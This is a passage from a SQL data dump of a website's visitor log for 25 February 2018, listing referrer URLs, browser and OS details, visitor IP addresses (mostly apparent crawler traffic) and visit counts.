'Unknown','','173.252.115.149','000',1,0),(24854,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.183','000',2,0),(24855,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.2','000',1,0),(24856,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.131','000',1,0),(24857,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.165','000',1,0),(24858,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.140','000',3,0),(24859,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.151','000',4,0),(24860,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.81','000',1,0),(24861,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.19','000',1,0),(24862,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.125','000',4,0),(24863,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.42','000',3,0),(24864,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',1,0),(24865,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',3,0),(24866,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.65','000',1,0),(24867,'2018-02-25','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(24868,'2018-02-25','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',2,0),(24869,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.101','000',2,0),(24870,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.204','000',3,0),(24871,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.124','000',3,0),(24872,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.195','000',5,0),(24873,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.112','000',2,0),(24874,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.29','000',2,0),(24875,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.118','000',2,0),(24876,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',1,0),(24877,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.3','000',1,0),(24878,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.250','000',3,0),(24879,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.59','000',1,0),(24880,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.20','000',3,0),(24881,'2018-02-25','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.216.219','000',1,0),(24882,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.214.192','000',2,0),(24883,'2018-02-25','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','159.203.111.218','000',1,0),(24884,'2018-02-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(24885,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.58','000',1,0),(24886,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.211','000',2,0),(24887,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.72','000',1,0),(24888,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.177','000',1,0),(24889,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.91','000',1,0),(24890,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.22','000',1,0),(24891,'2018-02-25','https://www.google.com/','Chrome','Macintosh','64.0.3282.140','','68.100.56.217','000',13,0),(24892,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.28','000',4,0),(24893,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.28','000',4,0),(24894,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',1,0),(24895,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',2,0),(24896,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.118','000',1,0),(24897,'2018-02-25','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(24898,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.28','000',1,0),(24899,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.213','000',3,0),(24900,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.104','000',1,0),(24901,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.106','000',1,0),(24902,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.32','000',1,0),(24903,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.15','000',1,0),(24904,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.209','000',2,0),(24905,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.36','000',5,0),(24906,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.207','000',2,0),(24907,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',2,0),(24908,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',1,0),(24909,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.136','000',3,0),(24910,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.132','000',1,0),(24911,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.101','000',1,0),(24912,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.98','000',2,0),(24913,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.202','000',3,0),(24914,'2018-02-25','http://aibolita.com/','MSIE','Windows','6.0','','134.249.48.151','000',3,0),(24915,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.6','000',4,0),(24916,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',1,0),(24917,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',2,0),(24918,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',3,0),(24919,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','163.44.166.222','000',2,0),(24920,'2018-02-25','https://www.google.com/','Safari','Macintosh','11.0.2','','73.129.1.82','000',2,0),(24921,'2018-02-25','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.236.227.169','000',2,0),(24922,'2018-02-25','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(24923,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.118','000',2,0),(24924,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.130','000',2,0),(24925,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.139','000',2,0),(24926,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.152','000',3,0),(24927,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.184','000',1,0),(24928,'2018-02-25','https://www.google.com/','Safari','iPhone','11.0','','68.134.25.149','000',3,0),(24929,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.117','000',5,0),(24930,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.90','000',2,0),(24931,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.207','000',3,0),(24932,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.208','000',2,0),(24933,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.58','000',1,0),(24934,'2018-02-25','https://zphiblgz.org','Chrome','iPhone','64.0.3282.112','','68.134.25.149','000',2,0),(24935,'2018-02-25','https://www.google.com/','Safari','Macintosh','11.0.3','','76.100.49.104','000',7,0),(24936,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.57','000',2,0),(24937,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.210','000',1,0),(24938,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.84','000',4,0),(24939,'2018-02-25','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','173.64.123.159','000',2,0),(24940,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.143','000',2,0),(24941,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.187','000',1,0),(24942,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.215','000',1,0),(24943,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.116','000',2,0),(24944,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.136','000',1,0),(24945,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.252','000',1,0),(24946,'2018-02-25','http://komukc.com.ua/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(24947,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.31','000',2,0),(24948,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.73','000',2,0),(24949,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.36','000',1,0),(24950,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.90','000',1,0),(24951,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.170','000',1,0),(24952,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.185','000',3,0),(24953,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.84','000',1,0),(24954,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.126','000',1,0),(24955,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.115','000',1,0),(24956,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.105','000',3,0),(24957,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.118','000',2,0),(24958,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.20','000',1,0),(24959,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.74','000',3,0),(24960,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',1,0),(24961,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.205','000',2,0),(24962,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.229','000',2,0),(24963,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.201','000',2,0),(24964,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.68','000',3,0),(24965,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',1,0),(24966,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.214','000',4,0),(24967,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.70','000',1,0),(24968,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.210','000',3,0),(24969,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.205','000',1,0),(24970,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.196','000',1,0),(24971,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','133.130.113.127','000',2,0),(24972,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.86','000',2,0),(24973,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.199','000',1,0),(24974,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.66','000',1,0),(24975,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.82','000',2,0),(24976,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.198','000',2,0),(24977,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.205','000',2,0),(24978,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.214.55','000',2,0),(24979,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.118','000',4,0),(24980,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.219','000',2,0),(24981,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.202','000',1,0),(24982,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.73','000',2,0),(24983,'2018-02-25','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',2,0),(24984,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',1,0),(24985,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.135','000',2,0),(24986,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.160','000',2,0),(24987,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',1,0),(24988,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.138','000',3,0),(24989,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.167','000',1,0),(24990,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.168','000',3,0),(24991,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.27','000',2,0),(24992,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.182','000',1,0),(24993,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.56','000',2,0),(24994,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.53','000',2,0),(24995,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.208','000',2,0),(24996,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.92','000',5,0),(24997,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','95.211.94.107','000',1,0),(24998,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.200','000',2,0),(24999,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.67','000',2,0),(25000,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.194','000',2,0),(25001,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.216','000',1,0),(25002,'2018-02-25','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','52.165.166.139','000',1,0),(25003,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.8','000',2,0),(25004,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.216','000',1,0),(25005,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.185','000',2,0),(25006,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.115','000',1,0),(25007,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.20','000',1,0),(25008,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.197','000',1,0),(25009,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.117','000',2,0),(25010,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.83','000',2,0),(25011,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.116','000',1,0),(25012,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.174','000',3,0),(25013,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.184','000',1,0),(25014,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.146','000',2,0),(25015,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.211','000',1,0),(25016,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.201','000',1,0),(25017,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.177','000',1,0),(25018,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.148','000',1,0),(25019,'2018-02-25','https://pills24h.com/buy-clonidine-online-without-prescription/','MSIE','Windows','6.0','','178.137.162.218','000',3,0),(25020,'2018-02-25','http://komp-pomosch.ru/','MSIE','Windows','6.0','','178.137.16.45','000',5,0),(25021,'2018-02-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(25022,'2018-02-25','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',2,0),(25023,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.79','000',2,0),(25024,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.77','000',1,0),(25025,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.144','000',1,0),(25026,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.83','000',1,0),(25027,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.50','000',2,0),(25028,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.239','000',1,0),(25029,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',2,0),(25030,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.87','000',3,0),(25031,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.182','000',2,0),(25032,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.184','000',2,0),(25033,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.201','000',2,0),(25034,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.224','000',4,0),(25035,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.216','000',3,0),(25036,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.201','000',1,0),(25037,'2018-02-25','https://kozhakoshek.com/','Opera','Windows','8.01','','134.249.48.151','000',1,0),(25038,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.215','000',2,0),(25039,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.155','000',2,0),(25040,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.180','000',2,0),(25041,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.253','000',1,0),(25042,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.183','000',1,0),(25043,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.149','000',1,0),(25044,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.200','000',1,0),(25045,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.210','000',1,0),(25046,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.75','000',1,0),(25047,'2018-02-25','https://avtorskoe-vino.ru/','MSIE','Windows','6.0','','46.118.116.121','000',2,0),(25048,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.112','000',4,0),(25049,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.79','000',1,0),(25050,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.112','000',1,0),(25051,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.122','000',2,0),(25052,'2018-02-25','http://www.google.com/','Chrome','Android','64.0.3282.137','','73.200.100.35','000',5,0),(25053,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.216','000',4,0),(25054,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',1,0),(25055,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',1,0),(25056,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.73','000',1,0),(25057,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.224','000',1,0),(25058,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.120','000',1,0),(25059,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.209','000',1,0),(25060,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.181','000',1,0),(25061,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.9','000',2,0),(25062,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',3,0),(25063,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.238','000',1,0),(25064,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.198','000',4,0),(25065,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.124','000',1,0),(25066,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',2,0),(25067,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.206','000',1,0),(25068,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.11','000',1,0),(25069,'2018-02-25','https://www.google.com/','Safari','iPhone','11.0','','69.140.29.93','000',3,0),(25070,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.144','000',2,0),(25071,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.134','000',2,0),(25072,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.20','000',2,0),(25073,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.30','000',1,0),(25074,'2018-02-25','https://zphiblgz.org','Chrome','Unknown','64.0.3264.0','','165.227.116.45','000',3,0),(25075,'2018-02-25','https://www.google.com/','Safari','iPhone','11.0','','107.77.197.229','000',3,0),(25076,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',4,0),(25077,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.192','000',1,0),(25078,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.139','000',2,0),(25079,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.145','000',1,0),(25080,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.208','000',1,0),(25081,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.115','000',2,0),(25082,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.89','000',2,0),(25083,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.112','000',1,0),(25084,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.227','000',1,0),(25085,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.86','000',1,0),(25086,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.165','000',1,0),(25087,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.18','000',1,0),(25088,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.246','000',2,0),(25089,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.43','000',1,0),(25090,'2018-02-25','https://www.google.com/','Chrome','Windows','64.0.3282.186','','68.134.25.149','000',6,0),(25091,'2018-02-25','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','71.121.167.97','000',12,0),(25092,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.56','000',2,0),(25093,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.187','000',2,0),(25094,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',1,0),(25095,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.55','000',1,0),(25096,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.55','000',1,0),(25097,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.16','000',2,0),(25098,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.210','000',1,0),(25099,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.114','000',1,0),(25100,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.233','000',1,0),(25101,'2018-02-25','http://www.zas1914.org/zas1914/index.php/links','Safari','Macintosh','11.0.3','','73.163.41.131','000',2,0),(25102,'2018-02-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',2,0),(25103,'2018-02-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.43','000',2,0),(25104,'2018-02-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.115','000',1,0),(25105,'2018-02-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.24','000',2,0),(25106,'2018-02-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',2,0),(25107,'2018-02-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.58','000',1,0),(25108,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.100','000',3,0),(25109,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.39','000',2,0),(25110,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.87','000',1,0),(25111,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.118','000',1,0),(25112,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.251','000',1,0),(25113,'2018-02-25','https://lm.facebook.com/','Chrome','Android','64.0.3282.137','','71.121.163.10','000',7,0),(25114,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.207','000',2,0),(25115,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',3,0),(25116,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.27','000',1,0),(25117,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',2,0),(25118,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.16','000',3,0),(25119,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',2,0),(25120,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.228','000',2,0),(25121,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',2,0),(25122,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.121','000',2,0),(25123,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.206','000',2,0),(25124,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.142','000',1,0),(25125,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.148','000',1,0),(25126,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.89.84','000',3,0),(25127,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.252','000',1,0),(25128,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.167','000',1,0),(25129,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.244','000',1,0),(25130,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.117','000',1,0),(25131,'2018-02-25','https://zphiblgz.org/scholarship/application/','Chrome','Windows','63.0.3239.132','','174.61.96.236','000',1,0),(25132,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',2,0),(25133,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',2,0),(25134,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',1,0),(25135,'2018-02-25','https://z